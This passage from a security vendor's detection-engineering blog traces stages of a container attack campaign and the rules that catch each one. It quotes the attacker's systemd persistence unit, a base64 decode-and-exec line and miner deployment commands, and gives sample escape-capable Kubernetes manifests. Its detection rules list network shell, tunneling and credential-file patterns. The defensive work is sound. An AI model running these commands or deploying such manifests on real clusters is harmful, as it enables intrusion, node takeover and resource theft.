     &quot;pacman&quot;, &quot;rpm&quot;, &quot;dpkg&quot;
   )] by file.path
  [process where host.os.type == &quot;linux&quot; and event.type == &quot;start&quot; and 
   event.action == &quot;exec&quot; and process.interactive == true and
   container.id like &quot;?*&quot;] by process.executable
</code></pre>
<p>Here, we focus on interactive processes while excluding files created by package managers, since we expect those to be present in typical workloads.</p>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/execution_interactive_file_creation_followed_by_execution.toml">File Creation and Execution Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml">File Download Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon lateral movement:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image10.png" alt="Figure 3: Detection rules triggering for stage 3: Lateral Movement via kube.py" title="Figure 3: Detection rules triggering for stage 3: Lateral Movement via kube.py" /></p>
<h3>Stage 4 – Establishing persistence via Systemd</h3>
<p>Persistence mechanisms such as systemd services generally make little sense in container environments. Most containers are designed to be short-lived, single-process workloads that rely on the container runtime or orchestrator for lifecycle management. They typically do not run a full init system, and even when systemd is present, changes made inside the container rarely survive redeployment, rescheduling, or image rebuilds.</p>
<p>As a result, attempts to establish persistence via <code>systemd</code> from within a container are a strong indicator of an anomaly. They often indicate one of two things: either the container is running with elevated privileges and access to the host filesystem, or the attacker expects to escape the container boundary and have their persistence mechanism take effect at the node level.</p>
<p>In the TeamPCP campaign, the attacker attempts to establish persistence by creating a <code>systemd</code> service:</p>
<pre><code class="language-shell">cat&gt;/etc/systemd/system/teampcp-react.service&lt;&lt;SVCEOF
[Unit]
Description=PCPcat React Scanner
After=network.target
[Service]
Type=simple
WorkingDirectory=${dir}
ExecStart=/usr/bin/python3 ${dir}/react.py
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
SVCEOF
</code></pre>
<p>This action is not consistent with normal container behavior. Writing systemd unit files from inside a container suggests an intent to persist beyond the container lifecycle, which is only meaningful if the underlying host is affected.</p>
<p>D4C captures this behavior as file creation activity in sensitive system locations originating from a container context. The following detection logic looks for write-oriented file activity in common Linux persistence paths, including systemd services, timers, cron jobs, sudoers files, and shell profile modifications:</p>
<pre><code class="language-sql">file where event.type != &quot;deletion&quot; and
/* open events currently only log file opens with write intent */
event.action in (&quot;creation&quot;, &quot;rename&quot;, &quot;open&quot;) and (
  file.path like (
    // Cron &amp; Anacron Jobs
    &quot;/etc/cron.allow&quot;, &quot;/etc/cron.deny&quot;, &quot;/etc/cron.d/*&quot;,
    &quot;/etc/cron.hourly/*&quot;, &quot;/etc/cron.daily/*&quot;, &quot;/etc/cron.weekly/*&quot;, 
    &quot;/etc/cron.monthly/*&quot;, &quot;/etc/crontab&quot;, &quot;/var/spool/cron/crontabs/*&quot;, 
    &quot;/var/spool/anacron/*&quot;,

    // At Job
    &quot;/var/spool/cron/atjobs/*&quot;, &quot;/var/spool/atjobs/*&quot;,

    // Sudoers
    &quot;/etc/sudoers*&quot;
  ) or
  (
    // Systemd Service/Timer
    file.path like (
      &quot;/etc/systemd/system/*&quot;, &quot;/etc/systemd/user/*&quot;,
      &quot;/usr/local/lib/systemd/system/*&quot;, &quot;/lib/systemd/system/*&quot;, 
      &quot;/usr/lib/systemd/system/*&quot;, &quot;/usr/lib/systemd/user/*&quot;,
      &quot;/home/*/.config/systemd/user/*&quot;, &quot;/home/*/.local/share/systemd/user/*&quot;,
      &quot;/root/.config/systemd/user/*&quot;, &quot;/root/.local/share/systemd/user/*&quot;
    ) and
    file.extension in (&quot;service&quot;, &quot;timer&quot;)
  ) or
  (
    // Shell Profile Configuration
    file.path like (&quot;/etc/profile.d/*&quot;, &quot;/etc/zsh/*&quot;) or (
      file.path like (&quot;/home/*/*&quot;, &quot;/etc/*&quot;, &quot;/root/*&quot;) and
      file.name in (
  	 &quot;profile&quot;, &quot;bash.bashrc&quot;, &quot;bash.bash_logout&quot;, &quot;csh.cshrc&quot;,
        &quot;csh.login&quot;, &quot;config.fish&quot;, &quot;ksh.kshrc&quot;, &quot;.bashrc&quot;,
        &quot;.bash_login&quot;, &quot;.bash_logout&quot;, &quot;.bash_profile&quot;, &quot;.bash_aliases&quot;, 
        &quot;.zprofile&quot;, &quot;.zshrc&quot;, &quot;.cshrc&quot;, &quot;.login&quot;, &quot;.logout&quot;, &quot;.kshrc&quot;
      )
    )
  )
) and container.id like &quot;?*&quot; and
not process.name in (
  &quot;apt&quot;, &quot;apt-get&quot;, &quot;dnf&quot;, &quot;microdnf&quot;, &quot;yum&quot;, &quot;zypper&quot;, &quot;tdnf&quot;,
  &quot;apk&quot;, &quot;pacman&quot;, &quot;rpm&quot;, &quot;dpkg&quot;
)
</code></pre>
<p>This detection does not focus solely on <code>systemd</code>. Instead, it models persistence more broadly by covering multiple common Linux persistence vectors that attackers may attempt once code execution is achieved. By explicitly excluding package managers, the rule reduces noise from legitimate update and installation activity.</p>
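<p>The path matching at the core of the rule can be illustrated with a small Python sketch. This uses only a simplified subset of the rule's globs (the real rule also constrains systemd paths by file extension and checks the container and process fields shown above):</p>
<pre><code class="language-python">from fnmatch import fnmatch

# Simplified subset of the persistence-relevant path globs from the rule
PERSISTENCE_GLOBS = [
    '/etc/cron.d/*', '/etc/crontab', '/var/spool/cron/crontabs/*',
    '/etc/sudoers*',
    '/etc/systemd/system/*', '/usr/lib/systemd/system/*',
    '/etc/profile.d/*',
]

def persistence_relevant(path):
    return any(fnmatch(path, glob) for glob in PERSISTENCE_GLOBS)

# The TeamPCP unit file lands squarely in a watched location
assert persistence_relevant('/etc/systemd/system/teampcp-react.service')
assert not persistence_relevant('/tmp/miner')
</code></pre>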
<p>The detection rule that triggered in this stage is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/persistence_modification_of_persistence_relevant_files.toml">Modification of Persistence Relevant Files Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon persistence:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image5.png" alt="Figure 4: Detection rules triggering for stage 4: Establishing Persistence via Systemd" title="Figure 4: Detection rules triggering for stage 4: Establishing Persistence via Systemd" /></p>
<p>When this detection fires in a container context, it is a strong indicator of post-compromise behavior with potential host-level impact. It highlights activity that is not only suspicious but also structurally incompatible with how containers are expected to behave.</p>
<h3>Stage 5 – Installing tooling at runtime</h3>
<p>In Docker-based deployments, the attacker installs required tooling dynamically:</p>
<pre><code class="language-shell">apk add --no-cache curl bash python3
</code></pre>
<p>This allows the same payload to run across different base images without modification.</p>
<p>From a defender’s perspective, runtime package installation inside a container is a strong indicator of post-deployment tampering. D4C detects this through process execution telemetry tied to known package managers.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and process.interactive == true and (
  (
    process.name in (
      &quot;apt&quot;, &quot;apt-get&quot;, &quot;dnf&quot;, &quot;microdnf&quot;, &quot;yum&quot;, &quot;zypper&quot;, &quot;tdnf&quot;
    ) and process.args == &quot;install&quot;
  ) or
  (process.name == &quot;apk&quot; and process.args == &quot;add&quot;) or
  (process.name == &quot;pacman&quot; and process.args like &quot;-*S*&quot;) or
  (process.name in (&quot;rpm&quot;, &quot;dpkg&quot;) and process.args in (&quot;-i&quot;, &quot;--install&quot;))
) and
process.args like (
  &quot;curl&quot;, &quot;wget&quot;, &quot;socat&quot;, &quot;busybox&quot;, &quot;openssl&quot;, &quot;torsocks&quot;,
  &quot;netcat&quot;, &quot;netcat-openbsd&quot;, &quot;netcat-traditional&quot;, &quot;ncat&quot;, &quot;tor&quot;,
  &quot;python*&quot;, &quot;perl&quot;, &quot;node&quot;, &quot;nodejs&quot;, &quot;ruby&quot;, &quot;lua&quot;, &quot;bash&quot;, &quot;sh&quot;,
  &quot;dash&quot;, &quot;zsh&quot;, &quot;fish&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;ksh&quot;
) and container.id like &quot;?*&quot;
</code></pre>
<p>Not all package installations in containers are malicious; some containers legitimately install packages at startup as part of orchestration. However, because threat actors often use package managers to install their required tooling, this activity is a strong signal in already-deployed container runtimes.</p>
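<p>The per-package-manager matching in the rule reduces to a small decision table, sketched here in Python for clarity (simplified; the real rule also checks interactivity, the target package names, and the container context shown above):</p>
<pre><code class="language-python">def is_package_install(name, args):
    # Mirrors the rule's per-package-manager install verbs (simplified)
    if name in ('apt', 'apt-get', 'dnf', 'microdnf', 'yum', 'zypper', 'tdnf'):
        return 'install' in args
    if name == 'apk':
        return 'add' in args
    if name == 'pacman':
        return any(a.startswith('-') and 'S' in a for a in args)
    if name in ('rpm', 'dpkg'):
        return '-i' in args or '--install' in args
    return False

# The TeamPCP command from this stage matches
assert is_package_install('apk', ['add', '--no-cache', 'curl', 'bash', 'python3'])
assert not is_package_install('apk', ['info'])
</code></pre>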
<p>The detection rule that triggered in this stage is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/execution_tool_installation.toml">Tool Installation Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon tool installation:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image2.png" alt="Figure 5: Detection rules triggering for stage 5: Installing Tooling at Runtime" title="Figure 5: Detection rules triggering for stage 5: Installing Tooling at Runtime" /></p>
<h3>Stage 6 – Establishing tunneling and proxy access</h3>
<p>Once stable execution and persistence are in place, TeamPCP shifts focus from access to connectivity. At this stage, the attackers deploy tunneling and proxy tooling such as <code>frps</code> and <code>gost</code> to expose internal services and maintain reliable external access.</p>
<p>The purpose of this step is to convert compromised containers into reusable infrastructure. By establishing tunnels or forwarders, the attackers can pivot into other environments, relay traffic, or reuse the compromised workload as part of a larger attack chain.</p>
<p>D4C detects this activity through process execution telemetry. The execution of known tunneling tools inside containers is uncommon for legitimate workloads and stands out clearly when combined with interactive execution and container context.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and (
  (
    // Tunneling and/or Port Forwarding via process args
    (process.args regex &quot;&quot;&quot;.*[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{1,5}:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{1,5}.*&quot;&quot;&quot;) or
    // gost
    (process.name == &quot;gost&quot; and process.args : (&quot;-L*&quot;, &quot;-C*&quot;, &quot;-R*&quot;)) or
    // ssh
    (process.name == &quot;ssh&quot; and (
     process.args like (&quot;-*R*&quot;, &quot;-*L*&quot;, &quot;-*D*&quot;, &quot;-*w*&quot;) and 
     not (process.args == &quot;chmod&quot; or process.args like &quot;*rungencmd*&quot;))
    ) or
    // ssh Tunneling and/or Port Forwarding via SSH option
    (process.name == &quot;ssh&quot; and process.args == &quot;-o&quot; and process.args like~(
      &quot;*ProxyCommand*&quot;, &quot;*LocalForward*&quot;, &quot;*RemoteForward*&quot;,
      &quot;*DynamicForward*&quot;, &quot;*Tunnel*&quot;, &quot;*GatewayPorts*&quot;, 
      &quot;*ExitOnForwardFailure*&quot;, &quot;*ProxyCommand*&quot;, &quot;*ProxyJump*&quot;
      )
    ) or
    // sshuttle
    (process.name == &quot;sshuttle&quot; and
     process.args in (&quot;-r&quot;, &quot;--remote&quot;, &quot;-l&quot;, &quot;--listen&quot;)
    ) or
    // earthworm
    (process.args == &quot;-s&quot; and process.args == &quot;-d&quot; and
     process.args == &quot;rssocks&quot;
    ) or
    // socat
    (process.name == &quot;socat&quot; and
     process.args like~ (&quot;TCP4-LISTEN:*&quot;, &quot;SOCKS*&quot;)
    ) or
    // chisel
    (process.name like~ &quot;chisel*&quot; and process.args in (&quot;client&quot;, &quot;server&quot;)) or
    // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy &amp; ngrok 
    (process.name in (
      &quot;iodine&quot;, &quot;iodined&quot;, &quot;dnscat&quot;, &quot;hans&quot;, &quot;hans-ubuntu&quot;, &quot;ptunnel-ng&quot;,
      &quot;ssf&quot;, &quot;3proxy&quot;, &quot;ngrok&quot;, &quot;wstunnel&quot;, &quot;pivotnacci&quot;, &quot;frps&quot;, 
      &quot;proxychains&quot;
      )
    )
  )
) and container.id like &quot;?*&quot;
</code></pre>
<p>There are many tunneling and port forwarding tools available on Linux systems. The umbrella rule displayed above leverages a combination of regex, process names, and process arguments to detect commonly observed tunneling activity.</p>
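<p>The port-forwarding regex in that rule targets the <code>local-ip:port:remote-ip:port</code> shape that most forwarders accept. A quick Python check of the same expression against sample command lines:</p>
<pre><code class="language-python">import re

# The IP:PORT:IP:PORT forward pattern from the rule above
FORWARD_RE = re.compile(
    r'.*[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{1,5}'
    r':[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{1,5}.*'
)

# A gost-style listener forwarding a local port to an internal host matches
assert FORWARD_RE.match('-L tcp://0.0.0.0:8080:10.0.0.5:22')
# An ordinary download URL does not
assert not FORWARD_RE.match('curl http://10.0.0.5:80/index.html')
</code></pre>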
<p>The detection rule that triggered in this stage is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml">Tunneling and/or Port Forwarding Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon tunneling and proxy access:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image8.png" alt="Figure 6: Detection rules triggering for stage 6: Establishing Tunneling and Proxy Access" title="Figure 6: Detection rules triggering for stage 6: Establishing Tunneling and Proxy Access" /></p>
<p>Detecting tunneling is important because it often marks the transition from short-lived compromise to sustained attacker presence. When correlated with earlier stages, it provides strong confirmation of intentional, ongoing abuse rather than opportunistic execution.</p>
<h3>Stage 7 – Encoded payload execution</h3>
<p>To obscure payload logic, the attacker executes a base64-encoded payload directly via Python:</p>
<pre><code class="language-shell">python3 -c &quot;exec(base64.b64decode('&lt;payload&gt;').decode())&quot;
</code></pre>
<p>This technique reduces visibility into the payload itself but introduces distinctive execution characteristics: encoded arguments passed directly to an interpreter in an interactive session.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and process.interactive == true and (
  (process.name in (
    &quot;base64&quot;, &quot;base64plain&quot;, &quot;base64url&quot;, &quot;base64mime&quot;, &quot;base64pem&quot;,
    &quot;base32&quot;, &quot;base16&quot;
    ) and process.args like~ &quot;*-*d*&quot;
  ) or
  (process.name == &quot;xxd&quot; and process.args like~ (&quot;-*r*&quot;, &quot;-*p*&quot;)) or
  (process.name == &quot;openssl&quot; and process.args == &quot;enc&quot; and
   process.args in (&quot;-d&quot;, &quot;-base64&quot;, &quot;-a&quot;)
  ) or
  (process.name like &quot;python*&quot; and (
    (process.args == &quot;base64&quot; and process.args in (&quot;-d&quot;, &quot;-u&quot;, &quot;-t&quot;)) or
    (process.args == &quot;-c&quot; and process.args like &quot;*base64*&quot; and
     process.args like &quot;*b64decode*&quot;)
    )
  ) or
  (process.name like &quot;perl*&quot; and process.args like &quot;*decode_base64*&quot;) or
  (process.name like &quot;ruby*&quot; and process.args == &quot;-e&quot; and
   process.args like &quot;*Base64.decode64*&quot;
  )
) and container.id like &quot;?*&quot;
</code></pre>
<p>There are many ways to decode a payload, but the umbrella rule shown above captures the most commonly observed techniques.</p>
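<p>A harmless reconstruction of the core technique makes the detection surface obvious: the interpreter's argument list carries the telltale <code>base64</code>/<code>b64decode</code> strings even though the payload itself is an opaque blob (the payload below is a benign stand-in):</p>
<pre><code class="language-python">import base64

# Benign stand-in for the attacker's payload
source = "print('hi')"
encoded = base64.b64encode(source.encode()).decode()

# What ends up on the command line: only the opaque blob plus the
# decode-and-exec scaffolding that the rule keys on in process.args
argv = ['python3', '-c', f"exec(base64.b64decode('{encoded}').decode())"]

assert base64.b64decode(encoded).decode() == source
assert any('b64decode' in a for a in argv)
</code></pre>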
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/defense_evasion_potential_evasion_via_encoded_payload.toml">Encoded Payload Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/df9c27d82e74eb51e39376f1af30d2beb738c673/rules/integrations/cloud_defend/execution_suspicious_interactive_interpreter_command_execution.toml">Suspicious Interpreter Execution Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/defense_evasion_decoded_payload_piped_to_interpreter.toml">Decoded Payload Piped to Interpreter Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon execution:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image12.png" alt="Figure 7: Detection rules triggering for stage 7: Encoded Payload Execution" title="Figure 7: Detection rules triggering for stage 7: Encoded Payload Execution" /></p>
<h3>Stage 8 – Miner deployment and execution</h3>
<p>Eventually, the attacker reconstructs a miner from base64, writes it to disk, makes it executable, and launches it:</p>
<pre><code class="language-shell">/bin/sh -c &quot;printf IyEvYmlu&lt;&lt;TRUNCATED&gt;&gt;&gt;***** &gt;&gt; /tmp/miner.b64&quot;
/bin/sh -c &quot;base64 -d /tmp/miner.b64 &gt; /tmp/miner &amp;&amp; chmod +x /tmp/miner &amp;&amp; rm /tmp/miner.b64&quot;
</code></pre>
<p>This stage represents the shift from setup to monetization. The attacker is now actively abusing cluster resources.</p>
<p>As mentioned previously, D4C detects the decoding of the base64 payload using the same rule linked in the previous stage. Three other important signals are the creation of a base64-encoded payload, file permission changes in specific directories, and the execution of newly created binaries in temporary directories.</p>
<p>For the creation of base64-encoded payloads, an umbrella rule detects the execution of a shell with the <code>echo</code>/<code>printf</code> built-ins in combination with a list of commonly abused command-line patterns:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and 
process.interactive == true and process.name in (
  &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;
) and process.args == &quot;-c&quot; and process.args like (&quot;*echo *&quot;, &quot;*printf *&quot;) and 
process.args like (
  &quot;*/etc/cron*&quot;, &quot;*/etc/rc.local*&quot;, &quot;*/dev/tcp/*&quot;, &quot;*/etc/init.d*&quot;,
  &quot;*/etc/update-motd.d*&quot;, &quot;*/etc/ld.so*&quot;, &quot;*/etc/sudoers*&quot;, &quot;*base64 *&quot;, 
  &quot;*base32 *&quot;, &quot;*base16 *&quot;, &quot;*/etc/profile*&quot;, &quot;*/dev/shm/*&quot;, &quot;*/etc/ssh*&quot;, 
  &quot;*/home/*/.ssh/*&quot;, &quot;*/root/.ssh*&quot; , &quot;*~/.ssh/*&quot;, &quot;*xxd *&quot;, &quot;*/etc/shadow*&quot;,
  &quot;* /tmp/*&quot;, &quot;* /var/tmp/*&quot;, &quot;* /dev/shm/* &quot;, &quot;* ~/*&quot;, &quot;* /home/*&quot;,
  &quot;* /run/*&quot;, &quot;* /var/run/*&quot;, &quot;*|*sh&quot;, &quot;*|*python*&quot;, &quot;*|*php*&quot;, &quot;*|*perl*&quot;,
  &quot;*|*busybox*&quot;, &quot;*/var/www/*&quot;, &quot;*&gt;*&quot;, &quot;*;*&quot;, &quot;*chmod *&quot;, &quot;*rm *&quot; 
) and container.id like &quot;?*&quot;
</code></pre>
<p>Because it is scoped to interactive processes, this detection rule produces a high-confidence signal.</p>
<p>The second piece of the flow relates to file permission changes. Not all file permission changes are malicious, but an interactive process inside a container marking files in world-writable directories as executable is not expected to occur frequently.</p>
<pre><code class="language-sql">any where event.category in (&quot;file&quot;, &quot;process&quot;) and
event.type in (&quot;change&quot;, &quot;creation&quot;, &quot;start&quot;) and (
  process.name == &quot;chmod&quot; or
  (
    /*
    account for tools that execute utilities as a subprocess,
    in this case the target utility name will appear as a process arg
    */
    process.name in (
      &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;, &quot;busybox&quot;
    ) and
    process.args in (
      &quot;chmod&quot;, &quot;/bin/chmod&quot;, &quot;/usr/bin/chmod&quot;, &quot;/usr/local/bin/chmod&quot;
    )
  )
) and process.args in (&quot;4755&quot;, &quot;755&quot;, &quot;777&quot;, &quot;0777&quot;, &quot;444&quot;, &quot;+x&quot;, &quot;a+x&quot;) and
container.id like &quot;?*&quot;
</code></pre>
<p>Note that we leverage both the file and process event categories here. D4C captures these changes through file events if the policy is configured for them, but by default captures the corresponding process executions when set to monitor <code>execve</code> calls.</p>
<p>The final piece of this chain relates to the execution of binaries in world-writable locations. Legitimate container workloads rarely execute payloads from these directories.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and process.interactive == true and (
  process.executable like (
    &quot;/tmp/*&quot;, &quot;/dev/shm/*&quot;, &quot;/var/tmp/*&quot;, &quot;/run/*&quot;, &quot;/var/run/*&quot;,
    &quot;/mnt/*&quot;, &quot;/media/*&quot;, &quot;/boot/*&quot;
  ) or
  // Hidden process execution
  process.name like &quot;.*&quot;
) and container.id like &quot;?*&quot;
</code></pre>
<p>Note that the rule also captures hidden process executions. Threat actors commonly use this technique, naming executables with a leading dot so that they do not appear in default directory listings.</p>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml">File Execution Permission Modification Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml">Suspicious Echo or Printf Execution Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/defense_evasion_interactive_process_execution_from_suspicious_directory.toml">Suspicious Process Execution Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon miner deployment and execution:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image11.png" alt="Figure 8: Detection rules triggering for stage 8: Miner Deployment and Execution" title="Figure 8: Detection rules triggering for stage 8: Miner Deployment and Execution" /></p>
<h3>Stage 9 – Escalation to node control</h3>
<p>Once the attacker has a foothold inside a container and access to an overprivileged service account, the next step is to abuse the Kubernetes control plane itself. This stage moves the attack beyond a single container and into cluster-wide impact. The activity is detected via Kubernetes audit logs, and the rules surfaced by this intrusion fall into three distinct patterns.</p>
<h4>Stage 9.1 – Reconnaissance &amp; API Abuse</h4>
<p>The attacker's <code>kube.py</code> script uses the stolen service account token to enumerate pods, secrets, and nodes across all namespaces. From Kubernetes' perspective, this looks like a single identity making a burst of API calls across multiple resource types, a pattern that maps directly to permission-enumeration detection logic. The use of Python's <code>urllib</code> rather than <code>kubectl</code> as an API client is also unusual.</p>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/discovery_endpoint_permission_enumeration_by_user_and_srcip.toml">Kubernetes Potential Endpoint Permission Enumeration Attempt Detected</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml">Direct Interactive Kubernetes API Request by Unusual Utilities</a></li>
</ul>
<p>Resulting in the following detection alerts upon reconnaissance and API abuse:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image7.png" alt="Figure 9: Detection rules triggering for stage 9.1: Reconnaissance &amp; API Abuse" title="Figure 9: Detection rules triggering for stage 9.1: Reconnaissance &amp; API Abuse" /></p>
<h4>Stage 9.2 – Privilege Escalation &amp; Workload Manipulation</h4>
<p>With enumeration complete, the attacker creates a privileged DaemonSet (<code>system-monitor</code>) and relies on the overprivileged ClusterRole that was bound to the compromised service account. Both the workload creation and the role that enabled it are flagged: the DaemonSet as a sensitive workload modification, and the ClusterRole binding as a sensitive role granting broad permissions, including <code>pods/exec</code>, secret access, and DaemonSet creation.</p>
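<p>For illustration, the kind of overprivileged ClusterRole that enables this escalation might look like the following sketch; the role name and exact rule list are hypothetical, not taken from the scenario:</p>
<pre><code class="language-yaml"># Illustrative overprivileged ClusterRole of the kind flagged by
# the sensitive-role detection: exec into pods, read secrets, and
# create DaemonSets cluster-wide.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: system-monitor-role   # hypothetical name
rules:
  - apiGroups: [&quot;&quot;]
    resources: [&quot;pods&quot;, &quot;pods/exec&quot;, &quot;secrets&quot;, &quot;nodes&quot;]
    verbs: [&quot;get&quot;, &quot;list&quot;, &quot;create&quot;]
  - apiGroups: [&quot;apps&quot;]
    resources: [&quot;daemonsets&quot;]
    verbs: [&quot;get&quot;, &quot;list&quot;, &quot;create&quot;]
</code></pre>
<p>Binding a role like this to a workload service account hands an attacker everything needed for the next sub-stage: interactive access to other pods, credential material, and the ability to schedule a workload on every node.</p>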
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml">Unusual Kubernetes Sensitive Workload Modification</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml">Kubernetes Creation or Modification of Sensitive Role</a></li>
</ul>
<p>Resulting in the following detection alerts upon privilege escalation and workload manipulation:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image13.png" alt="Figure 10: Detection rules triggering for stage 9.2: Privilege Escalation &amp; Workload Manipulation" title="Figure 10: Detection rules triggering for stage 9.2: Privilege Escalation &amp; Workload Manipulation" /></p>
<h4>Stage 9.3 – Node-Level Escape</h4>
<p>The DaemonSet's pod spec is designed to break every isolation boundary a container normally provides. It requests privileged mode, attaches to the host network and PID namespace, and mounts the node's root filesystem. Each of these properties triggers a separate detection rule, and together they paint a clear picture of a container workload engineered for node escape.</p>
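<p>As an illustrative sketch (names are hypothetical), a DaemonSet pod spec combining those properties would look something like:</p>
<pre><code class="language-yaml"># Illustrative DaemonSet pod spec combining the four escape
# primitives: privileged mode, host network, host PID, and a
# hostPath mount of the node's root filesystem.
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: system-monitor        # hypothetical name
spec:
  selector:
    matchLabels: {app: system-monitor}
  template:
    metadata:
      labels: {app: system-monitor}
    spec:
      hostNetwork: true       # shares the node's network namespace
      hostPID: true           # shares the node's PID namespace
      containers:
        - name: monitor
          image: alpine
          securityContext:
            privileged: true  # disables most container isolation
          volumeMounts:
            - name: host-root
              mountPath: /host
      volumes:
        - name: host-root
          hostPath:
            path: /           # mounts the node's root filesystem
</code></pre>
<p>Each flagged property corresponds to one field in this spec, which is why the same workload creation event fires several rules at once.</p>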
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml">Kubernetes Pod Created with a Sensitive hostPath Volume</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml">Kubernetes Privileged Pod Created</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml">Kubernetes Pod Created With HostNetwork</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostpid.toml">Kubernetes Pod Created With HostPID</a></li>
</ul>
<p>Resulting in the following detection alerts upon node-level escape:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image3.png" alt="Figure 11: Detection rules triggering for stage 9.3: Node-Level Escape" title="Figure 11: Detection rules triggering for stage 9.3: Node-Level Escape" /></p>
<p>These three sub-stages also highlight a key boundary in container-focused detection. While D4C excels at observing what happens <em>inside</em> containers, identifying how and <em>why</em> those containers were created requires Kubernetes control-plane telemetry. In a follow-up “Kubernetes Detection Engineering” series, we will focus on correlating D4C runtime events with Kubernetes audit logs to detect multi-stage attacks that span workload creation, privilege escalation, and node-level impact.</p>
